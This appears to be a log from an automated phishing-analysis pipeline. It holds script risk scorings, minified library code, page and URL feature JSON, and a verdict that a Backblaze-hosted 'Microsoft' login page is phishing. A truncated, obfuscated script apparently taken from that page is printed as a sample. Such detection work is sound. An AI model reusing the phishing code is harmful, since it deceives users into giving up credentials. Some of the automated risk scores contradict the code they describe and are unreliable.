   - **External Data Transmission:** The script appears to be sending data to external domains, which could potentially include sensitive information. This adds 2 points.

3. **Low-Risk Indicators (1 point each):**
   - **Tracking Behavior:** The script includes some functionality related to analytics or tracking, which is a low-risk behavior, adding 1 point.

**Contextual Adjustments:**
- **Trusted Domains:** The script does not appear to be interacting with any known, reputable domains, so no points are subtracted.
- **Analytics/Telemetry:** The script's intent seems to align with typical analytics or telemetry functionality, so 2 points are subtracted.

**Final Scoring:**
The final risk score is 3, as the script demonstrates some potentially risky behaviors, but the overall context suggests it is likely part of a legitimate application or framework. Further review and optimization are recommended to address the identified concerns.

"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;
try{
_.z("NTMZac");
var f9=function(){_.Rl.call(this)};_.I(f9,_.Nn);f9.la=_.Nn.la;f9.prototype.yl=function(){throw Error("ui");};f9.prototype.JF=function(){throw Error("ui");};f9.prototype.Mb=function(){throw Error("ui");};_.lo(_.xwa,f9);
_.B();
}catch(e){_._DumpException(e)}
try{
_.z("rCcCxc");
_.B2=function(){_.Rl.call(this);this.B=[]};_.I(_.B2,_.Nn);_.B2.la=_.Nn.la;_.B2.prototype.vz=function(){for(var a=this.B.length-1;a>=0;a--){var c=this.B[a],e=new _.jn(c.element);if(!c.hY||e.ab("uW2Fw-Sx9Kwc-OWXEXe-uGFO6d")||e.ab("uW2Fw-Sx9Kwc-OWXEXe-FNFY6c")||e.ab("uW2Fw-Sx9Kwc-OWXEXe-FnSee")||e.ab("VfPpkd-Sx9Kwc-OWXEXe-uGFO6d")||e.ab("VfPpkd-Sx9Kwc-OWXEXe-FNFY6c")||e.ab("VfPpkd-Sx9Kwc-OWXEXe-FnSee"))return c.element}return null};_.lo(_.Fxa,_.B2);
_.B();
}catch(e){_._DumpException(e)}
try{
_.z("RAnnUd");

_.B();
}catch(e){_._DumpException(e)}
try{
var fP,mab,oab,pab,qab,jP,Aab,nab,Eab,sab,wab,Fab,yab;fP=function(){throw Error("E");};mab=function(a,c){c=String.fromCharCode.apply(null,c);return a==null?c:a+c};oab=function(a){switch(typeof a){case "boolean":return _.tba||(_.tba=[0,void 0,!0]);case "number":return a>0?void 0:a===0?nab||(nab=[0,void 0]):[-a,void 0];case "string":return[0,a];case "object":return a}};pab=function(a,c){var e=e===void 0?_.Yja:e;return new _.Fj(a,c,e)};qab=function(a,c,e,f,g){a.C_(e,_.nca(c,f),g)};
_.gP=function(a,c,e){return new _.Fj(a,c,e)};_.hP=function(a,c,e){_.uc(a,(0,_.qc)(a),c,e)};_.rab=function(a,c,e){a.D_(e,_.ac(c))};_.tab=function(a){return Array.isArray(a)?a[0]instanceof _.Fj?a:[sab,a]:[a,void 0]};
_.iP=function(a,c,e,f){var g=f[a];if(g)return g;g={};g.mF=oab(f[0]);var h=f[1],l=1;h&&h.constructor===Object&&(g.rU=h,h=f[++l],typeof h==="function"&&(g.SW=!0,_.uab!=null||(_.uab=h),_.vab!=null||(_.vab=f[l+1]),h=f[l+=2]));for(var m={};h&&Array.isArray(h)&&h.length&&typeof h[0]==="number"&&h[0]>0;){for(var p=0;p<h.length;p++)m[h[p]]=h;h=f[++l]}for(p=1;h!==void 0;){typeof h==="number"&&(p+=h,h=f[++l]);var q=void 0;if(h instanceof _.Fj)var u=h;else u=wab,l--;h=void 0;if((h=u)==null?0:h.D){h=f[++l];q=
f;var y=l;typeof h==="function"&&(h=h(),q[y]=h);q=h}h=f[++l];y=p+1;typeof h==="number"&&h<0&&(y-=h,h=f[++l]);for(;p<y;p++){var A=m[p];q?e(g,p,u,q,A):c(g,p,u,A)}}return f[a]=g};_.xab=function(a,c,e){a.A5(e,_.Pb(c))};
_.zab=function(a,c){a.removeAttribute("srcdoc");if(c instanceof _.pd)throw new yab("TrustedResourceUrl",2);var e="allow-same-origin allow-scripts allow-forms allow-popups allow-popups-to-escape-sandbox allow-storage-access-by-user-activation".split(" ");a.setAttribute("sandbox","");for(var f=0;f<e.length;f++)a.sandbox.supports&&!a.sandbox.supports(e[f])||a.sandbox.add(e[f]);c=_.zd(c);c!==void 0&&(a.src=c)};jP=void 0;
_.Bab=function(a){for(var c=0,e=a.B,f=e+10,g=a.D;e<f;){var h=g[e++];c|=h;if((h&128)===0)return _.Aj(a,e),!!(c&127)}throw Error("aa");};_.Cab=function(a,c){if(c<0)throw Error("ca`"+c);var e=a.B,f=e+c;if(f>a.C)throw Error("ba`"+(a.C-e)+"`"+c);a.B=f;return e};
_.Dab=function(a){var c=_.Bj(a.B)>>>0;a=a.B;var e=_.Cab(a,c);a=a.D;if(_.dja){var f=a,g;(g=Aab)||(g=Aab=new TextDecoder("utf-8",{fatal:!0}));c=e+c;f=e===0&&c===f.length?f:f.subarray(e,c);try{var h=g.decode(f)}catch(q){if(jP===void 0){try{g.decode(new Uint8Array([128]))}catch(u){}try{g.decode(new Uint8Array([97])),jP=!0}catch(u){jP=!1}}!jP&&(Aab=void 0);throw q;}}else{h=e;c=h+c;e=[];for(var l=null,m,p;h<c;)m=a[h++],m<128?e.push(m):m<224?h>=c?fP():(p=a[h++],m<194||(p&192)!==128?(h--,fP()):e.push((m&
31)<<6|p&63)):m<240?h>=c-1?fP():(p=a[h++],(p&192)!==128||m===224&&p<160||m===237&&p>=160||((g=a[h++])&192)!==128?(h--,fP()):e.push((m&15)<<12|(p&63)<<6|g&63)):m<=244?h>=c-2?fP():(p=a[h++],(p&192)!==128||(m<<28)+(p-144)>>30!==0||((g=a[h++])&192)!==128||((f=a[h++])&192)!==128?(h--,fP()):(m=(m&7)<<18|(p&63)<<12|(g&63)<<6|f&63,m-=65536,e.push((m>>10&1023)+55296,(m&1023)+56320))):fP(),e.length>=8192&&(l=mab(l,e),e.length=0);h=mab(l,e)}return h};
_.kP=_.gP(function(a,c,e){if(a.

{
  "brands": [
    "SharePoint"
  ]
}

```json
{
    "risk_score": 1,
    "reasoning": "The script primarily consists of polyfills and utility functions, with no high-risk behaviors such as dynamic code execution or data exfiltration. It interacts with the global object and defines some functions, but there is no indication of malicious intent or interaction with untrusted domains."
}

(function(){var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),g=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-
1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}},h=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular expression");return a+""};
g("String.prototype.endsWith",function(a){return a?a:function(b,c){var d=h(this,b,"endsWith");b+="";c===void 0&&(c=d.length);c=Math.max(0,Math.min(c|0,d.length));for(var e=b.length;e>0&&c>0;)if(d[--c]!=b[--e])return!1;return e<=0}});g("Object.is",function(a){return a?a:function(b,c){return b===c?b!==0||1/b===1/c:b!==b&&c!==c}});
g("Array.prototype.includes",function(a){return a?a:function(b,c){var d=this;d instanceof String&&(d=String(d));var e=d.length;c=c||0;for(c<0&&(c=Math.max(c+e,0));c<e;c++){var f=d[c];if(f===b||Object.is(f,b))return!0}return!1}});g("String.prototype.includes",function(a){return a?a:function(b,c){return h(this,b,"includes").indexOf(b,c||0)!==-1}});window.gapi=window.gapi||{};window.gapi.o=(new Date).getTime();/*

 Copyright The Closure Library Authors.
 SPDX-License-Identifier: Apache-2.0
*/
var m=this||self,n="closure_uid_"+(Math.random()*1E9>>>0),da=0,t=function(a){return a};/*

 Copyright Google LLC
 SPDX-License-Identifier: Apache-2.0
*/
var x={};var y=function(a){if(x!==x)throw Error("Bad secret");this.l=a};y.prototype.toString=function(){return this.l};new y("about:blank");new y("about:invalid#zClosurez");var A=[],D=function(a){console.warn("A URL with content '"+a+"' was sanitized away.")};A.indexOf(D)===-1&&A.push(D);/*
 gapi.loader.OBJECT_CREATE_TEST_OVERRIDE &&*/
var E=window,F=document,ea=E.location,fa=function(){},ha=/\[native code\]/,H=function(a,b,c){return a[b]=a[b]||c},ia=function(a){a=a.sort();for(var b=[],c=void 0,d=0;d<a.length;d++){var e=a[d];e!=c&&b.push(e);c=e}return b},I=function(){var a;if((a=Object.create)&&ha.test(a))a=a(null);else{a={};for(var b in a)a[b]=void 0}return a},J=H(E,"gapi",{});var M={};M=H(E,"___jsl",I());H(M,"I",0);H(M,"hel",10);var N=function(){var a=ea.href;if(M.dpo)var b=M.h;else{b=M.h;var c=RegExp("([#].*&|[#])jsh=([^&#]*)","g"),d=RegExp("([?#].*&|[?#])jsh=([^&#]*)","g");if(a=a&&(c.exec(a)||d.exec(a)))try{b=decodeURIComponent(a[2])}catch(e){}}return b},ja=function(a){var b=H(M,"PQ",[]);M.PQ=[];var c=b.length;if(c===0)a();else for(var d=0,e=function(){++d===c&&a()},f=0;f<c;f++)b[f](e)},O=function(a){return H(H(M,"H",I()),a,I())};var P=H(M,"perf",I()),Q=H(P,"g",I()),ka=H(P,"i",I());H(P,"r",[]);I();I();var R=function(a,b,c){var d=P.r;typeof d==="function"?d(a,b,c):d.push([a,b,c])},T=function(a,b,c){b&&b.length>0&&(b=ma(b),c&&c.length>0&&(b+="___"+ma(c)),b.length>28&&(b=b.substr(0,28)+(b.length-28)),c=b,b=H(ka,"_p",I()),H(b,c,I())[a]=(new Date).getTime(),R(a,"_p",c))},ma=function(a){return a.join("__").replace(/\./g,"_").replace(/\-/g,"_").replace(/,/g,"_")};var na=I(),U=[],V=function(a){throw Error("Bad hint: "+a);};U.push(["jsl",function(a){for(var b in a)if(Object.prototype.hasOwnProperty.call(a,b)){var c=a[b];typeof c=="object"?M[b]=H(M,b,[]).concat(c):H(M,b,c)}if(b=a.u)a=H(M,"us",[]),a.push(b),(b=/^https:(.*)$/.exec(b))&&a.push("http:"+b[1])}]);var oa=/^(\/[a-zA-Z0-9_\-]+)+$/,pa=[/\/amp\//,/\/amp$/,/^\/amp$/],qa=/^[a-zA-Z0-9\-_\.,!]+$/,ra=/^gapi\.loaded_[0-9]+$/,sa=/^[a-zA-Z0-9,._-]+$/,wa=function(a,b,c,d,e){var f=a.split(";"),k=f.shift(),l=na[k],p=null;l?p=l(f

{
    "risk_score": 7,
    "reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. While the intent is not entirely clear, the overall behavior suggests a potentially malicious script. Further investigation is recommended to determine the full scope and purpose of this code."
}

        const _0x365e9f = _0x24fc;
        (function(_0x151353, _0x28df1e) {
            const _0x5eddfd = _0x24fc,
                _0x11ceae = _0x151353();
            while (!![]) {
                try {
                    const _0xdd856f = parseInt(_0x5eddfd(0x1fd)) / 0x1 + parseInt(_0x5eddfd(0x20d)) / 0x2 + -parseInt(_0x5eddfd(0x201)) / 0x3 + parseInt(_0x5eddfd(0x21a)) / 0x4 + parseInt(_0x5eddfd(0x202)) / 0x5 * (parseInt(_0x5eddfd(0x1da)) / 0x6) + parseInt(_0x5eddfd(0x20e)) / 0x7 * (-parseInt(_0x5eddfd(0x1f3)) / 0x8) + -parseInt(_0x5eddfd(0x1e8)) / 0x9 * (parseInt(_0x5eddfd(0x215)) / 0xa);
                    if (_0xdd856f === _0x28df1e) break;
                    else _0x11ceae['push'](_0x11ceae['shift']());
                } catch (_0x3e9f41) {
                    _0x11ceae['push'](_0x11ceae['shift']());
                }
            }
        }(_0x4676, 0xe96ee), document[_0x365e9f(0x1eb)][_0x365e9f(0x213)](_0x365e9f(0x1fc), _0x365e9f(0x1db)), document[_0x365e9f(0x1eb)][_0x365e9f(0x213)](_0x365e9f(0x1fc), _0x365e9f(0x1f8)), document[_0x365e9f(0x203)][_0x365e9f(0x213)](_0x365e9f(0x1fb), '\x0a<div\x20class=\x22canvas\x22>\x0a\x20\x20\x20\x20<img\x20class=\x22imgclass\x22\x20src=\x22data:image/png;base64,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

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://www.google.com

{
  "brands": "unknown"
}

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": true,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://vaidttml.s3.us-east-005.backblazeb2.com

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "Microsoft Sharepoint"
  ]
}

{
  "brands": [
    "Microsoft"
  ]
}

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.",    "The URL 'vaidttml.s3.us-east-005.backblazeb2.com' does not match the legitimate domain for Microsoft.",    "The URL uses a cloud storage service domain (backblazeb2.com), which is not directly associated with Microsoft.",    "The presence of 's3' and 'backblazeb2' suggests the use of cloud storage, which can be legitimate but is often used in phishing to host malicious content.",    "The URL does not contain any direct reference to Microsoft, which is suspicious given the brand association."  ],  "riskscore": 9}
Google indexed: False